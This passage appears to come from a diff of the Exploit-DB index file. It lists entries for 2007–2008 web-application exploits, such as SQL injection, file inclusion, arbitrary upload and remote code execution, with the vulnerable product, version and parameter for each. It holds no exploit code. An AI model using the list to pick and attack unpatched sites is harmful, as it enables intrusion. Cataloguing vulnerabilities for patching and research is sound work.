+4735,exploits/php/webapps/4735.txt,"Oreon 1.4 / Centreon 1.4.1 - Multiple Remote File Inclusion Vulnerabilities",2007-12-14,"Michael Brooks",webapps,php, +4736,exploits/php/webapps/4736.txt,"Form Tools 1.5.0b - Multiple Remote File Inclusions",2007-12-14,RoMaNcYxHaCkEr,webapps,php, +4737,exploits/php/webapps/4737.txt,"PHP Real Estate - 'fullnews.php?id' SQL Injection",2007-12-14,t0pP8uZz,webapps,php, +4738,exploits/php/webapps/4738.txt,"gf-3xplorer 2.4 - Cross-Site Scripting / Local File Inclusion",2007-12-18,MhZ91,webapps,php, +4739,exploits/php/webapps/4739.pl,"MOG-WebShop - 'index.php?group' SQL Injection",2007-12-18,k1tk4t,webapps,php, +4740,exploits/php/webapps/4740.pl,"FreeWebShop 2.2.1 - Blind SQL Injection",2007-12-18,k1tk4t,webapps,php, +4741,exploits/php/webapps/4741.txt,"MySpace Content Zone 3.x - Arbitrary File Upload",2007-12-18,Don,webapps,php, +4743,exploits/php/webapps/4743.pl,"FreeWebShop 2.2.7 - 'cookie' Admin Password Grabber",2007-12-18,k1tk4t,webapps,php, +4750,exploits/php/webapps/4750.txt,"PHPMyRealty 1.0.x - 'search.php' SQL Injection",2007-12-18,Koller,webapps,php, +4753,exploits/php/webapps/4753.txt,"Dokeos 1.8.4 - Arbitrary File Upload",2007-12-18,RoMaNcYxHaCkEr,webapps,php, +4755,exploits/php/webapps/4755.txt,"PhpMyDesktop/Arcade 1.0 Final - 'phpdns_basedir' Remote File Inclusion",2007-12-18,RoMaNcYxHaCkEr,webapps,php, +4758,exploits/php/webapps/4758.txt,"xeCMS 1.x - 'view.php' Remote File Disclosure",2007-12-19,p4imi0,webapps,php, +4762,exploits/php/webapps/4762.txt,"nicLOR CMS - 'sezione_news.php' SQL Injection",2007-12-21,x0kster,webapps,php, +4763,exploits/php/webapps/4763.txt,"NmnNewsletter 1.0.7 - 'output' Remote File Inclusion",2007-12-21,CraCkEr,webapps,php, +4764,exploits/php/webapps/4764.txt,"Arcadem LE 2.04 - 'loadadminpage' Remote File Inclusion",2007-12-21,KnocKout,webapps,php, +4765,exploits/php/webapps/4765.txt,"1024 CMS 1.3.1 - Local File Inclusion / SQL Injection",2007-12-21,irk4z,webapps,php, +4766,exploits/php/webapps/4766.txt,"mBlog 1.2 - 'page' Remote File Disclosure",2007-12-21,irk4z,webapps,php, +4767,exploits/php/webapps/4767.txt,"Social Engine 2.0 - Multiple Local File Inclusions",2007-12-21,MhZ91,webapps,php, +4768,exploits/php/webapps/4768.py,"Shadowed Portal 5.7d3 - Remote Command Execution",2007-12-21,The:Paradox,webapps,php, +4769,exploits/php/webapps/4769.txt,"Shadowed Portal 5.7d3 - 'POST' Remote File Inclusion",2007-12-21,The:Paradox,webapps,php, +4770,exploits/php/webapps/4770.txt,"Wallpaper Site 1.0.09 - 'category.php' SQL Injection",2007-12-22,Koller,webapps,php, +4771,exploits/php/webapps/4771.txt,"IP Reg 0.3 - Multiple SQL Injections",2007-12-22,MhZ91,webapps,php, +4772,exploits/php/webapps/4772.txt,"zBlog 1.2 - SQL Injection",2007-12-22,Houssamix,webapps,php, +4774,exploits/php/webapps/4774.pl,"PHP ZLink 0.3 - 'go.php' SQL Injection",2007-12-23,DNX,webapps,php, +4775,exploits/php/webapps/4775.txt,"Adult Script 1.6.5 - Multiple SQL Injections",2007-12-23,MhZ91,webapps,php, +4776,exploits/php/webapps/4776.txt,"MMSLamp - 'idpro' SQL Injection",2007-12-23,x0kster,webapps,php, +4777,exploits/php/webapps/4777.txt,"WebSihirbazi 5.1.1 - 'pageid' SQL Injection",2007-12-24,bypass,webapps,php, +4778,exploits/php/webapps/4778.txt,"MeGaCheatZ 1.1 - Multiple SQL Injections",2007-12-24,MhZ91,webapps,php, +4779,exploits/php/webapps/4779.php,"CuteNews 1.4.5 - Admin Password md5 Hash Fetching",2007-12-24,waraxe,webapps,php, +4780,exploits/php/webapps/4780.txt,"ThemeSiteScript 1.0 - 'index.php?loadadminpage' Remote File Inclusion",2007-12-24,Koller,webapps,php, +4781,exploits/php/webapps/4781.php,"Jupiter 1.1.5ex - Privilege Escalation",2007-12-24,BugReport.IR,webapps,php, +4782,exploits/php/webapps/4782.txt,"Agares phpAutoVideo 2.21 - Local/Remote File Inclusion",2007-12-24,MhZ91,webapps,php, +4783,exploits/php/webapps/4783.txt,"Joomla! Component mosDirectory 2.3.2 - Remote File Inclusion",2007-12-24,ShockShadow,webapps,php, +4785,exploits/php/webapps/4785.txt,"TeamCalPro 3.1.000 - Multiple Local/Remote File Inclusions",2007-12-25,GoLd_M,webapps,php, +4786,exploits/php/webapps/4786.pl,"AuraCMS 2.2 - Remote Add Administrator",2007-12-25,k1tk4t,webapps,php, +4787,exploits/php/webapps/4787.pl,"RunCMS 1.6 - Get Admin Cookie Blind SQL Injection",2007-12-25,sh2kerr,webapps,php, +4788,exploits/php/webapps/4788.txt,"MailMachine Pro 2.2.4 - SQL Injection",2007-12-25,MhZ91,webapps,php, +4789,exploits/php/webapps/4789.php,"PMOS Help Desk 2.4 - Remote Command Execution",2007-12-25,EgiX,webapps,php, +4790,exploits/php/webapps/4790.txt,"RunCMS 1.6 - Multiple Vulnerabilities",2007-12-25,DSecRG,webapps,php, +4791,exploits/php/webapps/4791.txt,"eSyndiCat Link Exchange Script 2005-2006 - SQL Injection",2007-12-25,EgiX,webapps,php, +4792,exploits/php/webapps/4792.pl,"RunCMS 1.6 - Blind SQL Injection (IDS Evasion)",2007-12-26,sh2kerr,webapps,php, +4793,exploits/php/webapps/4793.txt,"Blakord Portal Beta 1.3.A (All Modules) - SQL Injection",2007-12-26,JosS,webapps,php, +4794,exploits/php/webapps/4794.pl,"XZero Community Classifieds 4.95.11 - Local File Inclusion / SQL Injection",2007-12-26,Kw3[R]Ln,webapps,php, +4795,exploits/php/webapps/4795.txt,"XZero Community Classifieds 4.95.11 - Remote File Inclusion",2007-12-26,Kw3[R]Ln,webapps,php, +4796,exploits/php/webapps/4796.txt,"PNPHPBB2 < 1.2i - 'PHPEx' Local File Inclusion",2007-12-26,irk4z,webapps,php, +4798,exploits/php/webapps/4798.php,"ZeusCMS 0.3 - Blind SQL Injection",2007-12-27,EgiX,webapps,php, +4799,exploits/php/webapps/4799.txt,"Joovili 3.0.6 - 'joovili.images.php' Remote File Disclosure",2007-12-27,EcHoLL,webapps,php, +4800,exploits/php/webapps/4800.txt,"xml2owl 0.1.1 - 'showcode.php' Remote Command Execution",2007-12-28,MhZ91,webapps,php, +4802,exploits/php/webapps/4802.txt,"XCMS 1.82 - Local/Remote File Inclusion",2007-12-28,nexen,webapps,php, +4804,exploits/php/webapps/4804.txt,"Hot or Not Clone by Jnshosts.com - Database Backup Dump",2007-12-28,RoMaNcYxHaCkEr,webapps,php, +4805,exploits/php/webapps/4805.txt,"NoseRub 0.5.2 - Login SQL Injection",2007-12-28,"Felix Groebert",webapps,php, +4807,exploits/php/webapps/4807.php,"jPORTAL 2.3.1 & UserPatch - 'forum.php' Remote Code Execution",2007-12-29,irk4z,webapps,php, +4808,exploits/php/webapps/4808.txt,"Mihalism Multi Forum Host 3.0.x - Remote File Inclusion",2007-12-29,GoLd_M,webapps,php, +4809,exploits/php/webapps/4809.txt,"CCMS 3.1 Demo - SQL Injection",2007-12-29,Pr0metheuS,webapps,php, +4810,exploits/php/webapps/4810.txt,"CMS Made Simple 1.2.2 Module TinyMCE - SQL Injection",2007-12-30,EgiX,webapps,php, +4811,exploits/php/webapps/4811.txt,"kontakt formular 1.4 - Remote File Inclusion",2007-12-30,bd0rk,webapps,php, +4812,exploits/php/webapps/4812.txt,"Mihalism Multi Host 2.0.7 - 'download.php' Remote File Disclosure",2007-12-30,GoLd_M,webapps,php, +4813,exploits/php/webapps/4813.txt,"XCMS 1.83 - Remote Command Execution",2007-12-30,x0kster,webapps,php, +4814,exploits/php/webapps/4814.txt,"Bitweaver R2 CMS - Arbitrary File Upload / Disclosure",2007-12-30,BugReport.IR,webapps,php, +4815,exploits/php/webapps/4815.txt,"matpo bilder galerie 1.1 - Remote File Inclusion",2007-12-30,Crackers_Child,webapps,php, +4816,exploits/php/webapps/4816.txt,"SanyBee Gallery 0.1.1 - 'p' Local File Inclusion",2007-12-30,jackal,webapps,php, +4817,exploits/php/webapps/4817.txt,"w-Agora 4.2.1 - 'cat' SQL Injection",2007-12-30,IHTeam,webapps,php, +4821,exploits/php/webapps/4821.txt,"IPTBB 0.5.4 - 'id' SQL Injection",2007-12-31,MhZ91,webapps,php, +4822,exploits/php/webapps/4822.txt,"MyPHP Forum 3.0 (Final) - Multiple SQL Injections",2007-12-31,x0kster,webapps,php, +4823,exploits/php/webapps/4823.pl,"ZenPhoto 1.1.3 - 'rss.php?albumnr' SQL Injection",2007-12-31,Silentz,webapps,php, +4824,exploits/asp/webapps/4824.py,"oneSCHOOL - 'admin/login.asp' SQL Injection",2007-12-31,Guga360,webapps,asp, +4826,exploits/php/webapps/4826.pl,"WebPortal CMS 0.6.0 - 'index.php' SQL Injection",2007-12-31,x0kster,webapps,php, +4827,exploits/php/webapps/4827.txt,"Joomla! Component PU Arcade 2.1.3 - SQL Injection",2007-12-31,Houssamix,webapps,php, +4828,exploits/php/webapps/4828.txt,"AGENCY4NET WEBFTP 1 - 'download2.php' File Disclosure",2008-01-01,GoLd_M,webapps,php, +4830,exploits/php/webapps/4830.txt,"ClipShare - 'UID' SQL Injection",2008-01-02,Krit,webapps,php, +4831,exploits/php/webapps/4831.txt,"MyPHP Forum 3.0 - 'Final' SQL Injection",2008-01-03,The:Paradox,webapps,php, +4832,exploits/php/webapps/4832.php,"Site@School 2.4.10 - Blind SQL Injection",2008-01-03,EgiX,webapps,php, +4833,exploits/php/webapps/4833.txt,"NetRisk 1.9.7 - Local/Remote File Inclusion",2008-01-04,S.W.A.T.,webapps,php, +4834,exploits/php/webapps/4834.txt,"samPHPweb 4.2.2 - 'db.php' Remote File Inclusion",2008-01-04,Crackers_Child,webapps,php, +4835,exploits/php/webapps/4835.py,"WebPortal CMS 0.6-beta - Remote Password Change",2008-01-04,The:Paradox,webapps,php, +4836,exploits/php/webapps/4836.txt,"samPHPweb 4.2.2 - 'songinfo.php' SQL Injection",2008-01-05,BackDoor,webapps,php, +4837,exploits/php/webapps/4837.pl,"ClipShare 2.6 - Remote User Password Change",2008-01-05,Pr0metheuS,webapps,php, +4838,exploits/php/webapps/4838.txt,"snetworks PHP Classifieds 5.0 - Remote File Inclusion",2008-01-05,Crackers_Child,webapps,php, +4840,exploits/php/webapps/4840.php,"Tribisur 2.0 - SQL Injection",2008-01-05,x0kster,webapps,php, +4841,exploits/php/webapps/4841.txt,"Invision Power Board 2.1.7 - ACTIVE Cross-Site Scripting / SQL Injection",2008-01-05,"Eugene Minaev",webapps,php, +4842,exploits/php/webapps/4842.pl,"NetRisk 1.9.7 - Remote Password Change",2008-01-05,Cod3rZ,webapps,php, +4843,exploits/php/webapps/4843.txt,"MODx CMS 0.9.6.1 - Multiple Vulnerabilities",2008-01-05,BugReport.IR,webapps,php, +4844,exploits/php/webapps/4844.txt,"WordPress Plugin Wp-FileManager 1.2 - Arbitrary File Upload",2008-01-06,Houssamix,webapps,php, +4845,exploits/php/webapps/4845.pl,"RunCMS Newbb_plus 0.92 - Client IP SQL Injection",2008-01-06,"Eugene Minaev",webapps,php, +4846,exploits/php/webapps/4846.txt,"Uebimiau Web-Mail 2.7.10/2.7.2 - Remote File Disclosure",2008-01-06,"Eugene Minaev",webapps,php, +4847,exploits/php/webapps/4847.txt,"XOOPS mod_gallery Zend_Hash_key + Extract - Remote File Inclusion",2008-01-06,"Eugene Minaev",webapps,php, +4848,exploits/asp/webapps/4848.txt,"PortalApp 4.0 - SQL Injection / Cross-Site Scripting / Authentication Bypass",2008-01-06,r3dm0v3,webapps,asp, +4849,exploits/php/webapps/4849.txt,"LoudBlog 0.6.1 - 'parsedpage' Remote Code Execution",2008-01-06,"Eugene Minaev",webapps,php, +4850,exploits/php/webapps/4850.txt,"Horde Web-Mail 3.x - 'go.php' Remote File Disclosure",2008-01-06,"Eugene Minaev",webapps,php, +4851,exploits/php/webapps/4851.txt,"CuteNews 1.1.1 - 'html.php' Remote Code Execution",2008-01-06,"Eugene Minaev",webapps,php, +4852,exploits/php/webapps/4852.txt,"NetRisk 1.9.7 - Cross-Site Scripting / SQL Injection",2008-01-06,"Virangar Security",webapps,php, +4853,exploits/php/webapps/4853.php,"DCP-Portal 6.11 - SQL Injection",2008-01-06,x0kster,webapps,php, +4854,exploits/php/webapps/4854.txt,"SineCMS 2.3.5 - Local File Inclusion / Remote Code Execution",2008-01-06,KiNgOfThEwOrLd,webapps,php, +4855,exploits/php/webapps/4855.txt,"Shop-Script 2.0 - 'index.php' Remote File Disclosure",2008-01-06,Fisher762,webapps,php, +4857,exploits/php/webapps/4857.txt,"OneCMS 2.4 - SQL Injection / Upload",2008-01-07,BugReport.IR,webapps,php, +4858,exploits/php/webapps/4858.pl,"FlexBB 0.6.3 - Cookies SQL Injection",2008-01-07,"Eugene Minaev",webapps,php, +4859,exploits/php/webapps/4859.txt,"EkinBoard 1.1.0 - Arbitrary File Upload / Authentication Bypass",2008-01-07,"Eugene Minaev",webapps,php, +4860,exploits/php/webapps/4860.pl,"EggBlog 3.1.0 - Cookies SQL Injection",2008-01-07,"Eugene Minaev",webapps,php, +4861,exploits/php/webapps/4861.txt,"TUTOS 1.3 - 'cmd.php' Remote Command Execution",2008-01-07,Houssamix,webapps,php, +4863,exploits/php/webapps/4863.pl,"SmallNuke 2.0.4 - Pass Recovery SQL Injection",2008-01-08,"Eugene Minaev",webapps,php, +4864,exploits/php/webapps/4864.txt,"ZeroCMS 1.0 Alpha - Arbitrary File Upload / SQL Injection",2008-01-08,KiNgOfThEwOrLd,webapps,php, +4865,exploits/php/webapps/4865.txt,"evilboard 0.1a - SQL Injection / Cross-Site Scripting",2008-01-08,seaofglass,webapps,php, +4867,exploits/php/webapps/4867.pl,"PHP Webquest 2.6 - 'id_actividad' SQL Injection",2008-01-08,ka0x,webapps,php, +4870,exploits/php/webapps/4870.txt,"osData 2.08 Modules Php121 - Local File Inclusion",2008-01-09,"Cold Zero",webapps,php, +4871,exploits/php/webapps/4871.php,"UploadImage/UploadScript 1.0 - Remote Change Admin Password",2008-01-09,Dj7xpl,webapps,php, +4872,exploits/php/webapps/4872.txt,"PHP Webquest 2.6 - Get Database Credentials",2008-01-09,MhZ91,webapps,php, +4876,exploits/php/webapps/4876.txt,"Tuned Studios Templates - Local File Inclusion",2008-01-09,DSecRG,webapps,php, +4879,exploits/php/webapps/4879.php,"Docebo 3.5.0.3 - 'lib.regset.php' Command Execution",2008-01-09,EgiX,webapps,php, +4880,exploits/php/webapps/4880.php,"DomPHP 0.81 - Remote Add Administrator",2008-01-10,j0j0,webapps,php, +4882,exploits/php/webapps/4882.txt,"MTCMS 2.0 - SQL Injection",2008-01-10,"Virangar Security",webapps,php, +4883,exploits/php/webapps/4883.txt,"DomPHP 0.81 - 'index.php' Remote File Inclusion",2008-01-10,Houssamix,webapps,php, +4884,exploits/php/webapps/4884.php,"Evilsentinel 1.0.9 - Multiple Vulnerabilities Disable",2008-01-10,BlackHawk,webapps,php, +4886,exploits/php/webapps/4886.pl,"iGaming CMS 1.3.1/1.5 - SQL Injection",2008-01-11,"Eugene Minaev",webapps,php, +4887,exploits/php/webapps/4887.html,"DigitalHive 2.0 RC2 - 'user_id' SQL Injection",2008-01-11,j0j0,webapps,php, +4888,exploits/php/webapps/4888.txt,"DomPHP 0.81 - 'cat' SQL Injection",2008-01-11,MhZ91,webapps,php, +4889,exploits/php/webapps/4889.txt,"vcart 3.3.2 - Multiple Remote File Inclusions",2008-01-11,k1n9k0ng,webapps,php, +4890,exploits/php/webapps/4890.txt,"AJchat 0.10 - 'unset''' bug SQL Injection",2008-01-11,"Eugene Minaev",webapps,php, +4891,exploits/php/webapps/4891.php,"Docebo 3.5.0.3 - '/lib.regset.php/non-blind' SQL Injection",2008-01-11,rgod,webapps,php, +4895,exploits/php/webapps/4895.txt,"ImageAlbum 2.0.0b2 - 'id' SQL Injection",2008-01-11,"Raw Security",webapps,php, +4896,exploits/php/webapps/4896.pl,"0DayDB 2.3 - 'id' Remote Authentication Bypass",2008-01-11,Pr0metheuS,webapps,php, +4897,exploits/php/webapps/4897.pl,"photokron 1.7 - Remote Database Disclosure",2008-01-11,Pr0metheuS,webapps,php, +4898,exploits/php/webapps/4898.txt,"Agares phpAutoVideo 2.21 - 'articlecat' SQL Injection (1)",2008-01-12,ka0x,webapps,php, +4899,exploits/php/webapps/4899.txt,"TaskFreak! 0.6.1 - SQL Injection",2008-01-12,TheDefaced,webapps,php, +4900,exploits/asp/webapps/4900.txt,"ASP Photo Gallery 1.0 - Multiple SQL Injections",2008-01-12,trew,webapps,asp, +4901,exploits/php/webapps/4901.txt,"TutorialCMS 1.02 - 'Username' SQL Injection",2008-01-12,ka0x,webapps,php, +4902,exploits/php/webapps/4902.txt,"minimal Gallery 0.8 - Remote File Disclosure",2008-01-13,Houssamix,webapps,php, +4904,exploits/php/webapps/4904.txt,"Binn SBuilder - 'nid' Blind SQL Injection",2008-01-13,JosS,webapps,php, +4905,exploits/php/webapps/4905.pl,"Agares phpAutoVideo 2.21 - 'articlecat' SQL Injection (2)",2008-01-13,Pr0metheuS,webapps,php, +4907,exploits/php/webapps/4907.py,"X7 Chat 2.0.5 - 'day' SQL Injection",2008-01-14,nonroot,webapps,php, +4908,exploits/php/webapps/4908.pl,"Xforum 1.4 - 'topic' SQL Injection",2008-01-14,j0j0,webapps,php, +4910,exploits/asp/webapps/4910.pl,"RichStrong CMS - 'cat' SQL Injection",2008-01-14,JosS,webapps,asp, +4912,exploits/php/webapps/4912.txt,"LulieBlog 1.0.1 - Remote Authentication Bypass",2008-01-15,ka0x,webapps,php, +4914,exploits/php/webapps/4914.txt,"FaScript FaMp3 1.0 - SQL Injection",2008-01-15,"Khashayar Fereidani",webapps,php, +4915,exploits/php/webapps/4915.txt,"FaScript FaName 1.0 - SQL Injection",2008-01-15,"Khashayar Fereidani",webapps,php, +4916,exploits/php/webapps/4916.txt,"FaScript FaPersian Petition - SQL Injection",2008-01-15,"Khashayar Fereidani",webapps,php, +4917,exploits/php/webapps/4917.txt,"FaScript FaPersianHack 1.0 - SQL Injection",2008-01-15,"Khashayar Fereidani",webapps,php, +4919,exploits/php/webapps/4919.txt,"Blog:CMS 4.2.1b - SQL Injection / Cross-Site Scripting",2008-01-16,DSecRG,webapps,php, +4920,exploits/php/webapps/4920.txt,"Aria 0.99-6 - 'page' Local File Inclusion",2008-01-16,DSecRG,webapps,php, +4921,exploits/asp/webapps/4921.txt,"MailBee WebMail Pro 4.1 - Remote File Disclosure",2008-01-16,-=M.o.B=-,webapps,asp, +4922,exploits/php/webapps/4922.txt,"alitalk 1.9.1.1 - Multiple Vulnerabilities",2008-01-16,tomplixsee,webapps,php, +4924,exploits/php/webapps/4924.php,"PixelPost 1.7 - Blind SQL Injection",2008-01-16,Silentz,webapps,php, +4925,exploits/php/webapps/4925.txt,"PHP-RESIDENCE 0.7.2 - 'Search' SQL Injection",2008-01-16,"Khashayar Fereidani",webapps,php, +4926,exploits/php/webapps/4926.pl,"Gradman 0.1.3 - 'agregar_info.php' Local File Inclusion",2008-01-16,JosS,webapps,php, +4927,exploits/php/webapps/4927.php,"MyBulletinBoard (MyBB) 1.2.10 - Remote Code Execution",2008-01-16,Silentz,webapps,php, +4928,exploits/php/webapps/4928.txt,"MyBulletinBoard (MyBB) 1.2.10 - Multiple Vulnerabilities",2008-01-16,waraxe,webapps,php, +4929,exploits/php/webapps/4929.txt,"PHPEcho CMS 2.0 - 'id' SQL Injection",2008-01-17,Stack,webapps,php, +4930,exploits/php/webapps/4930.txt,"Mini File Host 1.2 - 'language' Local File Inclusion",2008-01-17,Scary-Boys,webapps,php, +4933,exploits/php/webapps/4933.pl,"AuraCMS 1.62 - 'stat.php' Remote Code Execution",2008-01-18,k1tk4t,webapps,php, +4936,exploits/php/webapps/4936.txt,"Gradman 0.1.3 - 'info.php' Local File Inclusion",2008-01-18,Syndr0me,webapps,php, +4937,exploits/php/webapps/4937.txt,"Small Axe 0.3.1 - 'cfile' Remote File Inclusion",2008-01-18,RoMaNcYxHaCkEr,webapps,php, +4939,exploits/php/webapps/4939.txt,"WordPress Plugin WP-Forum 1.7.4 - SQL Injection",2008-01-19,"websec Team",webapps,php, +4940,exploits/php/webapps/4940.pl,"Mini File Host 1.2.1 - 'language' Local File Inclusion",2008-01-20,shinmai,webapps,php, +4942,exploits/php/webapps/4942.txt,"TikiWiki < 1.9.9 - 'tiki-listmovies.php' Directory Traversal",2008-01-20,Sha0,webapps,php, +4943,exploits/php/webapps/4943.txt,"Frimousse 0.0.2 - 'explorerdir.php' Local Directory Traversal",2008-01-20,Houssamix,webapps,php, +4944,exploits/php/webapps/4944.txt,"360 Web Manager 3.0 - 'IDFM' SQL Injection",2008-01-20,"Ded MustD!e",webapps,php, +4945,exploits/php/webapps/4945.txt,"bloofox 0.3 - SQL Injection / File Disclosure",2008-01-20,BugReport.IR,webapps,php, +4950,exploits/php/webapps/4950.php,"Coppermine Photo Gallery 1.4.10 - 'cpg1410_xek.php' SQL Injection",2008-01-21,bazik,webapps,php, +4951,exploits/php/webapps/4951.txt,"Mooseguy Blog System 1.0 - 'month' SQL Injection",2008-01-21,The_HuliGun,webapps,php, +4952,exploits/php/webapps/4952.txt,"BoastMachine 3.1 - 'mail.php' id SQL Injection",2008-01-21,"Virangar Security",webapps,php, +4953,exploits/php/webapps/4953.txt,"OZJournals 2.1.1 - 'id' File Disclosure",2008-01-21,shinmai,webapps,php, +4954,exploits/php/webapps/4954.txt,"IDM-OS 1.0 - 'Filename' File Disclosure",2008-01-21,MhZ91,webapps,php, +4955,exploits/php/webapps/4955.txt,"Lama Software 14.12.2007 - Multiple Remote File Inclusions",2008-01-21,QTRinux,webapps,php, +4956,exploits/php/webapps/4956.txt,"Alstrasoft Forum Pay Per Post Exchange 2.0 - SQL Injection",2008-01-21,t0pP8uZz,webapps,php, +4957,exploits/php/webapps/4957.txt,"MoinMoin 1.5.x - 'MOIND_ID' Cookie Login Bypass",2008-01-21,nonroot,webapps,php, +4958,exploits/php/webapps/4958.txt,"aflog 1.01 - Cross-Site Scripting / SQL Injection",2008-01-22,shinmai,webapps,php, +4960,exploits/php/webapps/4960.txt,"Easysitenetwork Recipe - 'categoryId' SQL Injection",2008-01-22,S@BUN,webapps,php, +4961,exploits/php/webapps/4961.php,"Coppermine Photo Gallery 1.4.10 - SQL Injection",2008-01-22,RST/GHC,webapps,php, +4962,exploits/php/webapps/4962.pl,"SetCMS 3.6.5 - Remote Command Execution",2008-01-22,RST/GHC,webapps,php, +4963,exploits/php/webapps/4963.pl,"YaBB SE 1.5.5 - Remote Command Execution",2008-01-22,RST/GHC,webapps,php, +4964,exploits/php/webapps/4964.php,"PHP-Nuke < 8.0 - 'sid' SQL Injection",2008-01-22,RST/GHC,webapps,php, +4965,exploits/php/webapps/4965.php,"PHP-Nuke 8.0 Final - 'sid' SQL Injection",2008-01-22,RST/GHC,webapps,php, +4966,exploits/php/webapps/4966.pl,"Invision Gallery 2.0.7 - SQL Injection",2008-01-22,RST/GHC,webapps,php, +4968,exploits/php/webapps/4968.txt,"Foojan Wms 1.0 - 'story' SQL Injection",2008-01-23,"Khashayar Fereidani",webapps,php, +4969,exploits/php/webapps/4969.txt,"LulieBlog 1.02 - SQL Injection",2008-01-23,"Khashayar Fereidani",webapps,php, +4970,exploits/asp/webapps/4970.txt,"Web Wiz Forums 9.07 - 'sub' Directory Traversal",2008-01-23,BugReport.IR,webapps,asp, +4971,exploits/asp/webapps/4971.txt,"Web Wiz Rich Text Editor 4.0 - Multiple Vulnerabilities",2008-01-23,BugReport.IR,webapps,asp, +4972,exploits/asp/webapps/4972.txt,"Web Wiz NewsPad 1.02 - 'sub' Directory Traversal",2008-01-23,BugReport.IR,webapps,asp, +4973,exploits/php/webapps/4973.txt,"Siteman 1.1.9 - 'cat' Remote File Disclosure",2008-01-23,"Khashayar Fereidani",webapps,php, +4975,exploits/php/webapps/4975.txt,"SLAED CMS 2.5 Lite - 'newlang' Local File Inclusion",2008-01-23,The_HuliGun,webapps,php, +4976,exploits/php/webapps/4976.txt,"Liquid-Silver CMS 0.1 - 'update' Local File Inclusion",2008-01-23,Stack,webapps,php, +4977,exploits/cgi/webapps/4977.txt,"Aconon Mail 2004 - Directory Traversal",2008-01-23,"Arno Toll",webapps,cgi, +4980,exploits/php/webapps/4980.txt,"Seagull 0.6.3 - 'files' Remote File Disclosure",2008-01-24,fuzion,webapps,php, +4984,exploits/php/webapps/4984.txt,"Tiger PHP News System 1.0b build 39 - SQL Injection",2008-01-25,0in,webapps,php, +4985,exploits/php/webapps/4985.txt,"flinx 1.3 - 'id' SQL Injection",2008-01-25,Houssamix,webapps,php, +4988,exploits/asp/webapps/4988.txt,"CandyPress eCommerce suite 4.1.1.26 - Multiple Vulnerabilities",2008-01-25,BugReport.IR,webapps,asp, +4989,exploits/php/webapps/4989.txt,"Simple Forum 3.2 - File Disclosure / Cross-Site Scripting",2008-01-26,tomplixsee,webapps,php, +4990,exploits/php/webapps/4990.txt,"phpIP 4.3.2 - Multiple SQL Injections",2008-01-26,"Charles Hooper",webapps,php, +4991,exploits/php/webapps/4991.txt,"Bubbling Library 1.32 - Multiple Local File Inclusions",2008-01-26,Stack,webapps,php, +4992,exploits/php/webapps/4992.txt,"WordPress Plugin WP-Cal 0.3 - 'editevent.php' SQL Injection",2008-01-27,Houssamix,webapps,php, +4993,exploits/php/webapps/4993.txt,"WordPress Plugin fGallery 2.4.1 - 'fimrss.php' SQL Injection",2008-01-27,Houssamix,webapps,php, +5000,exploits/php/webapps/5000.txt,"phpMyClub 0.0.1 - 'page_courante' Local File Inclusion",2008-01-28,S.W.A.T.,webapps,php, +5001,exploits/php/webapps/5001.txt,"bubbling library 1.32 - 'uri' Remote File Disclosure",2008-01-28,Stack,webapps,php, +5002,exploits/php/webapps/5002.txt,"Bigware Shop 2.0 - 'pollid' SQL Injection",2008-01-29,D4m14n,webapps,php, +5003,exploits/php/webapps/5003.txt,"Smart Publisher 1.0.1 - 'filedata' Remote Code Execution",2008-01-29,GoLd_M,webapps,php, +5006,exploits/php/webapps/5006.txt,"phpCMS 1.2.2 - 'file' Remote File Disclosure",2008-01-29,DSecRG,webapps,php, +5007,exploits/php/webapps/5007.txt,"Mambo Component 'com_newsletter' 4.5 - 'listid' SQL Injection",2008-01-29,S@BUN,webapps,php, +5008,exploits/php/webapps/5008.txt,"Mambo Component 'com_fq' - 'listid' SQL Injection",2008-01-29,S@BUN,webapps,php, +5009,exploits/php/webapps/5009.txt,"Mambo Component 'com_mamml' - 'listid' SQL Injection",2008-01-29,S@BUN,webapps,php, +5010,exploits/php/webapps/5010.txt,"Mambo Component 'com_glossary' 2.0 - 'catid' SQL Injection",2008-01-30,S@BUN,webapps,php, +5011,exploits/php/webapps/5011.txt,"Mambo Component musepoes - 'aid' SQL Injection",2008-01-30,S@BUN,webapps,php, +5012,exploits/php/webapps/5012.pl,"Connectix Boards 0.8.2 - 'template_path' Remote File Inclusion",2008-01-30,Houssamix,webapps,php, +5013,exploits/php/webapps/5013.php,"WordPress Plugin Adserve 0.2 - 'adclick.php' SQL Injection",2008-01-30,enter_the_dragon,webapps,php, +5014,exploits/php/webapps/5014.txt,"Mambo Component Recipes 1.00 - 'id' SQL Injection",2008-01-30,S@BUN,webapps,php, +5015,exploits/php/webapps/5015.txt,"Mambo Component jokes 1.0 - 'cat' SQL Injection",2008-01-30,S@BUN,webapps,php, +5016,exploits/php/webapps/5016.txt,"Mambo Component EstateAgent 0.1 - SQL Injection",2008-01-30,S@BUN,webapps,php, +5017,exploits/php/webapps/5017.php,"WordPress Plugin WassUp 1.4.3 - 'to_date' SQL Injection",2008-01-30,enter_the_dragon,webapps,php, +5018,exploits/php/webapps/5018.pl,"ibProArcade 3.3.0 - SQL Injection",2008-01-30,RST/GHC,webapps,php, +5019,exploits/php/webapps/5019.txt,"Coppermine Photo Gallery 1.4.14 - Remote Command Execution",2008-01-30,waraxe,webapps,php, +5020,exploits/php/webapps/5020.txt,"Joomla! Component ChronoForms 2.3.5 - Remote File Inclusion",2008-01-30,Crackers_Child,webapps,php, +5021,exploits/php/webapps/5021.txt,"PHP Links 1.3 - 'id' SQL Injection",2008-01-30,Houssamix,webapps,php, +5022,exploits/php/webapps/5022.txt,"PHP Links 1.3 - 'smarty.php' Remote File Inclusion",2008-01-30,Houssamix,webapps,php, +5026,exploits/php/webapps/5026.txt,"Mindmeld 1.2.0.10 - Multiple Remote File Inclusions",2008-01-31,"David Wharton",webapps,php, +5027,exploits/php/webapps/5027.txt,"sflog! 0.96 - Remote File Disclosure",2008-01-31,muuratsalo,webapps,php, +5029,exploits/php/webapps/5029.txt,"Mambo Component 'com_akogallery' 2.5b - SQL Injection",2008-01-31,S@BUN,webapps,php, +5030,exploits/php/webapps/5030.txt,"Mambo Component 'com_catalogshop' 1.0b1 - SQL Injection",2008-01-31,S@BUN,webapps,php, +5031,exploits/php/webapps/5031.txt,"Mambo Component Restaurant 1.0 - SQL Injection",2008-01-31,S@BUN,webapps,php, +5033,exploits/php/webapps/5033.txt,"LightBlog 9.5 - 'cp_upload_image.php' Arbitrary File Upload",2008-02-01,Omni,webapps,php, +5034,exploits/php/webapps/5034.txt,"Joomla! Component NeoReferences 1.3.1 - 'catid' SQL Injection",2008-02-01,S@BUN,webapps,php, +5035,exploits/php/webapps/5035.txt,"WordPress Plugin dmsguestbook 1.7.0 - Multiple 